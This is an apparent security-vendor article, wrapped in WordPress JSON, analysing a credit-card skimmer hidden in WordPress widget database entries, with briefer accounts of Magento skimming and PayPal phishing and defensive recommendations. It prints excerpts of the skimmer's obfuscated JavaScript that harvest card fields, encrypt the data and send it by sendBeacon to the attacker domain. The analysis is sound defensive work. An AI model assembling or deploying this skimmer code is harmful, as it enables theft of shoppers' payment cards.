{"id":20029,"date":"2025-02-13T09:00:04","date_gmt":"2025-02-13T02:00:04","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=20029"},"modified":"2025-02-17T13:54:45","modified_gmt":"2025-02-17T06:54:45","slug":"warning-new-skimmer-malware-targets-wordpress-users-to-steal-credit-cards-2","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/warning-new-skimmer-malware-targets-wordpress-users-to-steal-credit-cards-2\/","title":{"rendered":"Warning: New skimmer malware targets WordPress users to steal credit cards"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<h2 id=\"heading-overview\" class=\"permalink-heading\">Overview<\/h2>\n<p>Recently, information security researchers discovered a new form of skimmer malware attack that very cleverly steals credit card information, targeting e-commerce websites using WordPress. The attackers insert JavaScript code into the database related to the Content Management System (CMS) to steal sensitive payment information such as credit card numbers, expiration dates, CVV numbers, and payment details.<\/p>\n<h2 id=\"heading-attack-method\" class=\"permalink-heading\">Attack Method<\/h2>\n<p>According to Puja Srivastava, a researcher from Sucuri, the malware is only activated through the checkout page by stealing data from existing payment information fields or by creating a fake credit card information entry form.<\/p>\n<p>According to the security company owned by GoDaddy, they discovered the malware embedded in the\u00a0<strong>wp_options<\/strong>\u00a0table in WordPress, specifically in the following row:<\/p>\n<ul>\n<li>option_name: widget_block<\/li>\n<li>option_value: Contains obfuscated JavaScript code<\/li>\n<\/ul>\n<p>By inserting into the database rather than affecting additional files or plugins, this malware avoids detection by regular file scanning tools, allowing 
it to remain hidden on the compromised WordPress site. To carry out the attack, the attacker uses the WordPress admin panel (wp-admin \u2192 widgets) to insert JavaScript code into the HTML block widget.<\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/html-block-widget-596x600-1739157361.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20030 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/html-block-widget-596x600-1739157361.png\" alt=\"New skimmer malware FPT IS 1\" width=\"596\" height=\"600\" \/><\/a><\/p>\n<p>The following script checks whether the website URL contains the string &#8220;<strong>checkout<\/strong>&#8221; but does not contain the string &#8220;<strong>cart<\/strong>&#8221;. This ensures that the malware only activates when the user is about to submit their payment information.<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">const<\/span> _0x232f96 = <span class=\"hljs-string\">'\/checkout'<\/span>;\r\n<span class=\"hljs-keyword\">if<\/span> (<span class=\"hljs-built_in\">window<\/span>.location.toString().toLowerCase().search(<span class=\"hljs-string\">''<\/span> + _0x232f96) !== <span class=\"hljs-number\">-1<\/span>) {...}\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>The script then creates a fake payment form that closely mimics the legitimate checkout process. This form includes fields for credit card number, expiration date, CVV number, and billing information. 
If a valid payment form already exists on the website, the script collects the information entered into the existing fields in real time.<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">const<\/span> fakeForm = <span class=\"hljs-string\">'&lt;div id=\"stripe-payment-form-wrap\"&gt;...&lt;\/div&gt;'<\/span>;\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>This method ensures that the user is unaware they are providing sensitive payment information to the attacker.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20031 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png\" alt=\"New skimmer malware FPT IS 2\" width=\"2094\" height=\"988\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png 2094w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473-700x330.png 700w\" sizes=\"(max-width: 2094px) 100vw, 2094px\" \/><\/a><\/span><\/span><\/p>\n<p>By stealing payment information from existing fields instead of creating a new payment form, the malware ensures compatibility with various payment systems, as shown in the following script:<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-function\"><span class=\"hljs-keyword\">function<\/span> <span class=\"hljs-title\">_0x50efa4<\/span>() <\/span>{\r\n        _0x5ab8c6.Number = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x3c48c0)\r\n          ? 
<span class=\"hljs-built_in\">document<\/span>.getElementById(_0x3c48c0).value.replaceAll(<span class=\"hljs-string\">' '<\/span>, <span class=\"hljs-string\">''<\/span>)\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.CVV = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4cbdac)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4cbdac).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Expiration = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x526fa8)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x526fa8).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Address = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x72d8fc)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x72d8fc).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.FullName = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x37276b)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x37276b).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.City = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4e4454)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4e4454).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Zip = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x31755f)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x31755f).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>To avoid detection and hinder analysis while sending the stolen data back to the attacker&#8217;s server, the malware uses Base64 encoding combined with AES-CBC encryption. 
This makes the data look harmless when transmitted.<\/p>\n<p>&nbsp;<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">async<\/span> <span class=\"hljs-function\"><span class=\"hljs-keyword\">function<\/span> <span class=\"hljs-title\">_0x233872<\/span>(<span class=\"hljs-params\">_0x521845, _0x5e6977, _0xd6a8ef<\/span>) <\/span>{\r\n        <span class=\"hljs-keyword\">try<\/span> {\r\n          <span class=\"hljs-keyword\">var<\/span> _0x5180cb = <span class=\"hljs-built_in\">Uint8Array<\/span>.from(atob(_0x521845), <span class=\"hljs-function\">(<span class=\"hljs-params\">_0x47cd28<\/span>) =&gt;<\/span>\r\n              _0x47cd28.charCodeAt(<span class=\"hljs-number\">0<\/span>)\r\n            ),\r\n            _0x25deba = <span class=\"hljs-built_in\">Uint8Array<\/span>.from(atob(_0x5e6977), <span class=\"hljs-function\">(<span class=\"hljs-params\">_0x45785d<\/span>) =&gt;<\/span>\r\n              _0x45785d.charCodeAt(<span class=\"hljs-number\">0<\/span>)\r\n            ),\r\n            _0x152dd3 = <span class=\"hljs-keyword\">await<\/span> crypto.subtle.importKey(\r\n              <span class=\"hljs-string\">'raw'<\/span>,\r\n              _0x5180cb,\r\n              <span class=\"hljs-string\">'AES-CBC'<\/span>,\r\n              <span class=\"hljs-literal\">false<\/span>,\r\n              [<span class=\"hljs-string\">'encrypt'<\/span>]\r\n            ),\r\n            _0x3f060d = <span class=\"hljs-keyword\">await<\/span> crypto.subtle.encrypt(\r\n              {\r\n                <span class=\"hljs-attr\">name<\/span>: <span class=\"hljs-string\">'AES-CBC'<\/span>,\r\n                <span class=\"hljs-attr\">iv<\/span>: _0x25deba,\r\n              },\r\n              _0x152dd3,\r\n              <span class=\"hljs-keyword\">new<\/span> TextEncoder().encode(_0xd6a8ef)\r\n            )\r\n          <span class=\"hljs-keyword\">const<\/span> _0x4d0c53 = btoa(\r\n            <span 
class=\"hljs-built_in\">String<\/span>.fromCharCode.apply(<span class=\"hljs-literal\">null<\/span>, <span class=\"hljs-keyword\">new<\/span> <span class=\"hljs-built_in\">Uint8Array<\/span>(_0x3f060d))\r\n          )\r\n          <span class=\"hljs-keyword\">return<\/span> _0x4d0c53\r\n        } <span class=\"hljs-keyword\">catch<\/span> (_0x2dc142) {\r\n          <span class=\"hljs-keyword\">throw<\/span> _0x2dc142\r\n        }\r\n      }\r\n    }\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>After encrypting the data, the malware sends it to the attacker&#8217;s server using the\u00a0<strong>navigator.sendBeacon<\/strong> function, which avoids disrupting the user experience.<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\">navigator.sendBeacon(atob(<span class=\"hljs-string\">'aHR0cHM6Ly92YWxoYWZhdGhlci54eXo='<\/span>), encryptedData);\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>Information about the domain servers is as follows:<\/p>\n<ul>\n<li>valhafather[.]xyz<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20032 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png\" alt=\"New skimmer malware FPT IS 3\" width=\"1302\" height=\"841\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png 1302w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640-700x452.png 700w\" sizes=\"(max-width: 1302px) 100vw, 1302px\" \/><\/a><\/p>\n<ul>\n<li>fqbe23[.]xyz<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20033 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png\" alt=\"New skimmer malware 
FPT IS 4\" width=\"1300\" height=\"864\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png 1300w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650-700x465.png 700w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650-406x271.png 406w\" sizes=\"(max-width: 1300px) 100vw, 1300px\" \/><\/a><\/p>\n<h2 id=\"heading-previous-attack-campaigns\" class=\"permalink-heading\">Previous attack campaigns<\/h2>\n<p>Previously, in November 2024, researchers at Sucuri also discovered a similar attack campaign using malware written in JavaScript. This malware creates fake credit card information forms or steals data that users enter on the payment page of websites using Magento. The attack method is similar to that on websites using WordPress, with the difference being in how the collected information is obfuscated. The malware used on Magento converts the stolen information into JSON format, then encrypts it with XOR using the key &#8220;script&#8221; and finally encodes it with Base64. 
The information is then sent to the server\u00a0<strong>staticfonts[.]com.<\/strong><\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20034 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png\" alt=\"New skimmer malware FPT IS 5\" width=\"934\" height=\"524\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png 934w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671-700x393.png 700w\" sizes=\"(max-width: 934px) 100vw, 934px\" \/><\/a><\/span><\/span><\/p>\n<p>A phishing campaign also targets PayPal users to take over their accounts. According to a report by Carl Windsor, CISO of Fortinet, this phishing campaign is very sophisticated, using PayPal&#8217;s URL to deceive users.<\/p>\n<p>In this campaign, users receive an email requesting a payment of nearly $2,200. When the victim clicks the &#8220;Pay Now&#8221; button and enters their PayPal account information, the account will be linked to the attacker&#8217;s email address. The dangerous aspect of this campaign is that it uses PayPal&#8217;s email address (<a class=\"autolinkedURL autolinkedURL-email\" href=\"mailto:service@paypal.com\" target=\"_blank\" rel=\"noopener\">service@paypal.com<\/a>) and contains a legitimate login URL, making it easy to bypass security checks. 
The attacker can also easily create these emails by registering a test MS365 domain, which is free for three months.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg\"><img decoding=\"async\" class=\"aligncenter wp-image-20035 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg\" alt=\"New skimmer malware FPT IS 6\" width=\"1245\" height=\"997\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg 1245w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692-700x561.jpeg 700w\" sizes=\"(max-width: 1245px) 100vw, 1245px\" \/><\/a><\/span><\/span><\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig04-paypal-phishing-1739157714.jpeg\"><img decoding=\"async\" class=\"aligncenter wp-image-20036 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig04-paypal-phishing-1739157714.jpeg\" alt=\"New skimmer malware FPT IS 7\" width=\"441\" height=\"624\" \/><\/a><\/span><\/span><\/p>\n<p>Recently, there have also been cases where attackers use transaction simulation techniques to steal cryptocurrency from victims&#8217; wallets, making it even more difficult to detect and prevent fraud online.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20037 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png\" alt=\"New skimmer malware FPT IS 8\" width=\"1024\" height=\"587\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png 1024w, 
https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726-700x401.png 700w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/span><\/span><\/p>\n<h2 id=\"heading-impact\" class=\"permalink-heading\">Impact<\/h2>\n<p>Attackers will use the stolen credit card information to fund malicious ad campaigns on social media, purchase malware or Malware-as-a-Service (MaaS) services, or buy gift cards because they are very difficult to trace.<\/p>\n<p>Moreover, businesses and individual entrepreneurs are also affected, not only in terms of reputation but also economically.<\/p>\n<h2 id=\"heading-recommendations\" class=\"permalink-heading\">Recommendations<\/h2>\n<p>To prevent these attacks,\u00a0<strong>FPT Threat Intelligence<\/strong>\u00a0recommends:<\/p>\n<ul>\n<li>For websites using WordPress, access the WordPress admin panel, go to\u00a0<strong>wp-admin \u2192 Appearance \u2192 Widgets<\/strong>. 
Then check all\u00a0<strong>Custom HTML<\/strong>\u00a0to find and remove any suspicious\u00a0<strong>&lt;script&gt;<\/strong>\u00a0tags.<\/li>\n<li>Regularly update and patch vulnerabilities in plugins and themes.<\/li>\n<li>Manage admin accounts strictly, use strong passwords, enable two-factor authentication, and change passwords regularly.<\/li>\n<li>Monitor changes and the integrity of files on the system to detect any abnormalities as early as possible.<\/li>\n<li>Implement security solutions like a Web Application Firewall (WAF) to detect and block dangerous transmissions and prevent external attacks on the system.<\/li>\n<li>Regarding recent phishing activities, users need to be cautious with the information they receive and carefully check payment details.<\/li>\n<li>Raise user awareness and regularly conduct phishing drills with new and more sophisticated methods.<\/li>\n<\/ul>\n<h2 id=\"heading-references\" class=\"permalink-heading\">References<\/h2>\n<ol>\n<li><a href=\"https:\/\/thehackernews.com\/2025\/01\/wordpress-skimmers-evade-detection-by.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/thehackernews.com\/2025\/01\/wordpress-skimmers-evade-detection-by.html<\/a><\/li>\n<li><a href=\"https:\/\/blog.sucuri.net\/2025\/01\/stealthy-credit-card-skimmer-targets-wordpress-checkout-pages-via-database-injection.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/blog.sucuri.net\/2025\/01\/stealthy-credit-card-skimmer-targets-wordpress-checkout-pages-via-database-injection.html<\/a><\/li>\n<li><a href=\"https:\/\/blog.sucuri.net\/2024\/11\/credit-card-skimmer-malware-targeting-magento-checkout-pages.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/blog.sucuri.net\/2024\/11\/credit-card-skimmer-malware-targeting-magento-checkout-pages.html<\/a><\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phish-free-paypal-phishing\" target=\"_blank\" rel=\"noopener 
nofollow\">https:\/\/www.fortinet.com\/blog\/threat-research\/phish-free-paypal-phishing<\/a><\/li>\n<\/ol>\n<\/div>\n<div class=\"-mt-5 mb-10\">\n<table style=\"border-collapse: collapse; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/p>\n<p><em>Vu Nhat Lam \u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n","protected":false},"author":21,"featured_media":20227,"parent":0,"template":"","nang_luc":[],"danh_muc_goc_nhin_so":[],"dich_vu":[],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-20029","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/20029","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/20227"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=20029"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=20029"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=20029"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=20029"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=20029"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=20029"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-j
son\/wp\/v2\/san_pham?post=20029"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=20029"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}